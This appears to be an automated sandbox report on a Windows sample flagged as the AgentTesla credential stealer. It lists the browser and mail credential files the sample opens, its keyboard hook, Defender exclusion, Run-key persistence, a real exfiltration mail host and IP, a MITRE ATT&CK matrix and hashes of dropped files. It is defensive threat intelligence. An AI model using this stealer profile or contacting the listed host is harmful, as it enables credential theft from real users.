Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.4509557072.000000000319B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2259031078.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Eschemyquote24573j33.exe PID: 7140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 7056, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match; File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR
MITRE ATT&CK matrix (a leading number marks a technique the report flagged for this sample; the number is the count badge shown on the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 31 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 31 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1519249; Sample: Eschemyquote24573j33.exe; Startdate: 26/09/2024; Architecture: WINDOWS; Score: 100)
Signatures at start level: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
DNS/IP at start level: mail.musabody.com
• Eschemyquote24573j33.exe (started)
  • dropped: C:\Users\...schemyquote24573j33.exe.log (ASCII)
  • signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to register a low level keyboard hook; Adds a directory exclusion to Windows Defender
  • Eschemyquote24573j33.exe (started)
    • DNS/IP: mail.musabody.com 108.167.140.123, ports 49716 and 587, UNIFIEDLAYER-AS-1US, United States
    • dropped: C:\Users\user\AppData\Roaming\...\ctsdvwT.exe (PE32); C:\Users\user\...\ctsdvwT.exe:Zone.Identifier (ASCII)
    • signatures: Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
  • powershell.exe (started)
    • signatures: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)
• ctsdvwT.exe (started)
  • signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • ctsdvwT.exe (started)
• ctsdvwT.exe (started)
  • ctsdvwT.exe (started)
    • signatures: Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
--- | --- | --- | ---
Eschemyquote24573j33.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Eschemyquote24573j33.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
--- | --- | --- | ---
C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

No Antivirus matches

Source | Detection | Scanner | Label
--- | --- | --- | ---
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://mail.musabody.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
mail.musabody.com | 108.167.140.123 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://account.dyn.com/ | Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Eschemyquote24573j33.exe, 00000000.00000002.2068800637.0000000002966000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000007.00000002.2195768710.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.2276352451.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.musabody.com | Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
108.167.140.123 | mail.musabody.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519249
Start date and time: 2024-09-26 09:06:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Eschemyquote24573j33.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/9@1/1
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 226
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ctsdvwT.exe, PID 7056 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: Eschemyquote24573j33.exe
Time | Type | Description
--- | --- | ---
03:06:57 | API Interceptor | 8778927x Sleep call for process: Eschemyquote24573j33.exe modified
03:06:59 | API Interceptor | 11x Sleep call for process: powershell.exe modified
03:07:10 | API Interceptor | 7424130x Sleep call for process: ctsdvwT.exe modified
09:07:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
09:07:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Context for IP 108.167.140.123 (other analyses in which this indicator appeared):

Associated Sample Name / URL | Detection | Threat Name
--- | --- | ---
PO-2024)bekotas.pdf.exe | malicious | AgentTesla
Price 10243975 Bekotas A.S scan.pdf.exe | malicious | AgentTesla
DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe | malicious | AgentTesla
rRFQ_251477800TM.exe | malicious | AgentTesla, PureLog Stealer
Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe | malicious | AgentTesla, PureLog Stealer
rPO50018137-14_pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine
62402781, Fiyat Teklif Talebi.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine
2024-19-2118fernas.pdf.exe | malicious | AgentTesla
DHL Shipping DocumentTracking No Confirmation.doc.exe | malicious | AgentTesla, PureLog Stealer
Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exe | malicious | AgentTesla, PureLog Stealer
Context for domain mail.musabody.com (other analyses in which this indicator appeared):

Associated Sample Name / URL | Detection | Threat Name | Context (IP)
--- | --- | --- | ---
PO-2024)bekotas.pdf.exe | malicious | AgentTesla | 108.167.140.123
Price 10243975 Bekotas A.S scan.pdf.exe | malicious | AgentTesla | 108.167.140.123
DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exe | malicious | AgentTesla | 108.167.140.123
rRFQ_251477800TM.exe | malicious | AgentTesla, PureLog Stealer | 108.167.140.123
Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exe | malicious | AgentTesla, PureLog Stealer | 108.167.140.123
rPO50018137-14_pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 108.167.140.123
62402781, Fiyat Teklif Talebi.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 108.167.140.123
2024-19-2118fernas.pdf.exe | malicious | AgentTesla | 108.167.140.123
DHL Shipping DocumentTracking No Confirmation.doc.exe | malicious | AgentTesla, PureLog Stealer | 108.167.140.123
Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exe | malicious | AgentTesla, PureLog Stealer | 108.167.140.123
Context for ASN UNIFIEDLAYER-AS-1US (other analyses in which this ASN appeared):

Associated Sample Name / URL | Detection | Threat Name | Context (IP)
--- | --- | --- | ---
shipping documents.exe | malicious | AgentTesla | 162.214.80.31
autorization Letter.exe | malicious | AgentTesla | 192.185.129.60
http://www.richfieldkennel.com/SharePointProposalFile/ | malicious | HTMLPhisher | 192.185.102.120
https://putefix.dogfriendlytahoe.com/ | malicious | Unknown | 192.185.24.110
https://albertanewsprint.dogfriendlytahoe.com/ | malicious | Unknown | 192.185.24.110
INDIA - VSL PARTICULARS.pdf.exe | malicious | AgentTesla | 50.87.144.157
https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/ | malicious | Unknown | 50.6.153.157
https://abre.ai/k8hX | malicious | Unknown | 50.6.153.157
http://nky.beb.mybluehost.me/new/auth/entrar.php | malicious | Unknown | 50.6.153.4
https://turkiyecumhuriyetiziraatbankasi.com/ | malicious | Unknown | 162.240.37.219

No context
                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.380805901110357
                                          Encrypted:false
                                          SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                          MD5:2841736A1E367C6D039C41512DA2893E
                                          SHA1:8AE1356D954F14390DD115EB92E2B01F86E98141
                                          SHA-256:70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
                                          SHA-512:E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):669696
                                          Entropy (8bit):7.817123931818624
                                          Encrypted:false
                                          SSDEEP:12288:HzX8bQbtnLi/iVh9VmQ3DC8SlQ851wNXmPygPao9xDmCjc:0IR8iVhHmQ3OtlVFPHj
                                          MD5:BDD152D62CF8FA852E08C46505629663
                                          SHA1:B1A0FD6A26C5BF9BA02C12AFCDC89EEB8528040E
                                          SHA-256:A2CDC2F4FCAD4C6B982674A1B3B86A0F7BCDB7C8F18C1183799D70777C726859
                                          SHA-512:D269318E997D36A40D5B9DFFF0A2F2A40BEB99D4103B5CC233483AF14987E3FD167829435E0F176BB1371F86E1ED9F1F3CDEEF080338448F5265EAC77CBF29D4
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 58%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....K...............0..............L... ...`....@.. ....................................@..................................L..O....`..............................h3..p............................................ ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B.................L......H.......tS..lE...........................................................0..d.........}.....(.......(......s7...}.....sM...}.....sM...}.....sM...}......}......}.....~....}......(.....*.0.............o....sO...}.....{.........,n...}.....{.....o......{.....o......{.....{....oI....{....o....X.{....oK....{....o....Xs....o.......(....}.....*...0..Q..........o....sO...}.....{....,..{.......+....,&..{.....{.....{....oe.....{....o......*....0.............o....sO...}.....{....,..{....
